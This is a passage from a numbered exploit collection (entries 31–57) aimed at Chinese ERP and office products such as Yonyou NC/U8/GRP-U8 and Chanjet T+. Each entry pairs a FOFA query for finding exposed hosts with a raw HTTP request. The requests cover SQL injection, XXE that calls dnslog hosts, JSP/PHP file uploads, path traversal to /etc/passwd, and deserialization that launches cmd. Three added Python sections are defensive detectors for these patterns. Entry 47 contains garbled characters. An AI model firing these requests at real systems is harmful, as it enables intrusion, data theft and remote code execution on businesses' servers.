FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

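All five XXE items above (36, 37, 38, 40, 45) depend on one thing: the application hands attacker-controlled XML, sometimes wrapped in a form field or a CDATA section, to a parser that honours an inline DTD. The check a defender wants is therefore not a signature for each endpoint but a test for the DTD constructs themselves, and the fix on the application side is to refuse any DOCTYPE before parsing. The following is an added example written for this page, not code from the original post or from any vendor; the sample bodies are constructed after entries 40, 37 and 45, and the callback host in them is a placeholder.

```python
"""Added example (not from the original post or any vendor): spot the DTD
constructs behind the XXE items 36, 37, 38, 40 and 45, and parse untrusted
XML only after refusing any DOCTYPE. Sample bodies are constructed from the
requests on this page; hosts in them are placeholders."""
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Checked on the raw text, so a DOCTYPE hidden inside CDATA (37) or inside a
# form field such as msg= / __xml= / reqData= (36, 38, 45) is still seen.
_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
_EXTERNAL_DTD = re.compile(r"<!DOCTYPE\s+[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.I)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.I)
_PARAM_ENTITY = re.compile(r"<!ENTITY\s+%", re.I)


def xxe_findings(body: str) -> list:
    """Names of the XXE building blocks present in a request body.

    One round of URL-decoding is applied first so that %26Password%3B
    (entry 38) is examined as &Password; the way the parser sees it.
    """
    text = urllib.parse.unquote(body)
    findings = []
    if _DOCTYPE.search(text):
        findings.append("doctype")
    if _EXTERNAL_DTD.search(text):
        findings.append("external-dtd")       # <!DOCTYPE foo SYSTEM "http://..."> (45)
    if _EXTERNAL_ENTITY.search(text):
        findings.append("external-entity")    # <!ENTITY x SYSTEM "file:///..."> (36, 38, 40)
    if _PARAM_ENTITY.search(text):
        findings.append("parameter-entity")   # <!ENTITY % aaa SYSTEM ...> (37), out-of-band form
    return findings


def parse_untrusted(xml_text: str):
    """Parse XML from a client. Returns (root_tag, "ok") or (None, reason).

    Refusing every DOCTYPE is the robust fix: a service that exchanges SOAP
    or RPC messages never needs a client-supplied DTD.
    """
    if _DOCTYPE.search(xml_text):
        return None, "DTD not allowed"
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return None, "parse error: %s" % exc
    return root.tag, "ok"


# Constructed samples, shaped like the bodies of entries 40, 37 and 45.
SAMPLE_XCHANGE = ('<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM '
                  '"http://attacker.example">]><r><a>&xxe;</a></r>')
SAMPLE_IUPDATE = ('<iup:string xmlns:iup="urn:x"><![CDATA[<!DOCTYPE x [<!ENTITY % aaa SYSTEM '
                  '"http://attacker.example">%aaa;]><xxx/>]]></iup:string>')
SAMPLE_UFGOVBANK = ('reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM '
                    '"http://attacker.example">&signData=1')
SAMPLE_CLEAN = '<r><a>1</a></r>'

if __name__ == "__main__":
    for name, sample in [("XChangeServlet", SAMPLE_XCHANGE), ("IUpdateService", SAMPLE_IUPDATE),
                         ("ufgovbank", SAMPLE_UFGOVBANK), ("clean", SAMPLE_CLEAN)]:
        print(name, xxe_findings(sample), parse_untrusted(sample))
```

The findings list is what belongs in a WAF rule or a log-review script; parse_untrusted is the shape of the application-side fix. Note that xxe_findings deliberately does not try to parse: a body like entry 37's hides its DTD inside CDATA of an outer SOAP document, so a check that only looked at the outer document's DOCTYPE would pass it.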
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud 政府财务云 任意文件读取6 n% k: g2 U9 N# _$ a
FOFA:body="/pf/portal/login/css/fonts/style.css"# e% M/ [$ x2 [# H
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, r& z) S: t7 ^4 Q# w% o& gHost: x.x.x.x
; l# a+ `7 _' H: lCache-Control: max-age=0
3 P. D1 l# @; D# K. g3 jUpgrade-Insecure-Requests: 1
- P  F( q9 T, p" O( x: j1 z% OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; R7 y9 M, x8 g5 x4 M0 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) w' B6 T' q' }* ^' X" y! O  gAccept-Encoding: gzip, deflate, br+ u, ~5 a# `9 S2 N
Accept-Language: zh-CN,zh;q=0.9
1 ?3 U' W7 t$ X5 }" x  L- F( UIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT4 v! V9 s; B% V4 E: @
Connection: close9 p( x; l, Q  b% |* V- M

8 \% Q6 L$ v% b+ p9 S
. r+ Y( X% A# @1 E) @# K# v, s8 p2 J5 I# Y3 d. b
48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong social commerce ERP system (云时空社会化商业ERP系统) validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
(The only POC reproduced here is a path-traversal read of /etc/passwd, not an upload request.)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
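The upload items above (24, 28, 35, 42, 48, 49) and the file-read items (47, 53) are two sides of the same missing check: the server lets a client-supplied name or path decide where a file is written or which file is read. Entry 24 takes the target path from a second form field (fname), entry 35 and entry 49 put traversal or a trailing space into the filename itself, and entries 47 and 53 walk out of the download directory with ../ in literal and %2F-encoded form. The following is an added example written for this page, not code from the original post or from any of the products named; the directory names in it are placeholders. It shows the two server-side functions whose absence these POCs rely on.

```python
"""Added example (not from the original post or any vendor): the server-side
checks whose absence the upload and file-read items above exploit. Entries
24, 28, 35, 42, 48 and 49 accept a client-chosen file name or path and store
executable content under the web root; entries 47 and 53 resolve a client
path (../../../etc/passwd, ..%2F..%2F...) below a download directory.
Directory names used here are placeholders."""
import posixpath
import urllib.parse
from typing import Optional

# Server-side executable extensions; a name carrying one of these anywhere
# is refused regardless of the Content-Type the client sends.
EXECUTABLE_EXTS = {"jsp", "jspx", "jspf", "php", "php5", "phtml", "asp", "aspx", "ashx", "asmx"}


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated URL-encoding (..%252F.. becomes ../ after two rounds)."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_upload_name(client_name: str) -> Optional[str]:
    """Reduce a client-supplied filename to a bare, non-executable basename.

    Returns None when the name must be rejected. The stored path must then
    be built from the upload directory plus this name only, never from a
    second client field such as fname= (24), fileType= (28) or the query
    string filename= (35).
    """
    name = decode_fully(client_name).replace("\\", "/")   # \webapps\nc_web\x.jsp (24)
    name = posixpath.basename(name)                        # ./webapps/nc_web/1.jsp (35)
    name = name.rstrip(" .")                               # "s.php " with trailing space (49)
    if not name or name in (".", ".."):
        return None
    parts = name.lower().split(".")
    if any(part in EXECUTABLE_EXTS for part in parts[1:]):  # also refuses x.jsp.txt
        return None
    return name


def resolve_download(base_dir: str, requested: str) -> Optional[str]:
    """Resolve a user-supplied name under base_dir; None if it would escape.

    Normalisation runs after full decoding, so %2F-encoded traversal (53)
    collapses the same way as literal ../ (47). Symbolic links are not
    considered here; apply os.path.realpath to the result before opening it.
    """
    base = posixpath.normpath(base_dir)
    relative = decode_fully(requested).replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(base, relative))
    if candidate == base or not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for name in ["2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt", "\\webapps\\nc_web\\x.jsp",
                 "./webapps/nc_web/1.jsp", "s.php ", "1.jpg"]:
        print(repr(name), "->", safe_upload_name(name))
    for req in ["../../../etc/passwd", "/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", "report.pdf"]:
        print(repr(req), "->", resolve_download("/srv/app/files", req))
```

The decode-then-normalise order matters: a check that normalises first and decodes later passes the entry 53 form, and one that decodes only once passes a double-encoded %252F. Rejecting an executable extension anywhere in the name, not only at the end, is deliberate; it costs a few legitimate names and closes the multi-extension tricks that some servers honour.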

54. Chanjet T+ GetStoreWarehouseByStore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It runs a command that writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2d ZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}
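Entries 54 and 56 are the same bug reached through two AjaxPro handlers: the JSON deserializer honours a client-supplied "__type" key, so the body can name ObjectDataProvider and Process and have the server start cmd. Entry 23 is the Java counterpart, fastjson's "@type" autotype key resolving java.net.URL. Both are caught by one inspection: does the body carry a type discriminator at all? The following is an added example written for this page, not code from the original post or from Chanjet, Dahua or the fastjson project; the sample bodies are constructed after entries 23 and 56, and the command and callback host in them are placeholders.

```python
"""Added example (not from the original post or any vendor): find type
discriminators in JSON request bodies. Entry 23 abuses fastjson's "@type"
autotype key; entries 54 and 56 abuse the "__type" key that AjaxPro / the
.NET JavaScriptSerializer honour, instantiating ObjectDataProvider and
Process. The sample bodies below are constructed after those requests."""
import json
import re

TYPE_KEYS = ("@type", "__type")
# Raw-text fallback: fastjson accepts documents that strict parsers reject
# (entry 23's body is not valid JSON), so a check that only runs after a
# successful json.loads would miss exactly the payload it is meant to catch.
_RAW_TYPE = re.compile(r'"(@type|__type)"\s*:\s*"([^"]*)"')


def type_discriminators(body: str) -> list:
    """Return [(key, declared_type), ...] in document order."""
    try:
        doc = json.loads(body)
    except ValueError:
        return _RAW_TYPE.findall(body)
    found = []

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key in TYPE_KEYS and isinstance(value, str):
                    found.append((key, value))
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(doc)
    return found


def gadget_classes(body: str) -> list:
    """Declared types that name the gadget classes used on this page."""
    prefixes = ("System.Windows.Data.ObjectDataProvider", "System.Diagnostics.Process",
                "java.net.URL", "com.alibaba.fastjson.JSONObject")
    return [t for _, t in type_discriminators(body) if t.startswith(prefixes)]


def accept_body(body: str) -> bool:
    """Policy for an endpoint that deserialises client JSON: no type
    discriminator at all. A denylist of gadget names (gadget_classes) is
    useful for triage but is the wrong fix, because new chains keep
    appearing; the serializer itself should ignore @type / __type, and
    this check is defence in depth in front of it."""
    return not type_discriminators(body)


# Constructed after entry 23 (deliberately not strict JSON, as on the page).
SAMPLE_FASTJSON = '''{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://attacker.example"}
        }""
}'''

# Constructed after entry 56; the command is a placeholder.
SAMPLE_AJAXPRO = json.dumps({"storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
        "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName": "cmd", "Arguments": "/c whoami"}}}})

SAMPLE_BENIGN = json.dumps({"storeID": 42, "items": [{"id": 1, "name": "@type is just text here"}]})

if __name__ == "__main__":
    for label, body in [("fastjson", SAMPLE_FASTJSON), ("ajaxpro", SAMPLE_AJAXPRO), ("benign", SAMPLE_BENIGN)]:
        print(label, accept_body(body), gadget_classes(body))
```

The benign sample shows why the walk keys on dictionary keys rather than on substrings: "@type" appearing inside a string value is harmless and must not trip the check. The fastjson sample shows the opposite trap, a body that a strict parser throws away but that the vulnerable parser happily consumes.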

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
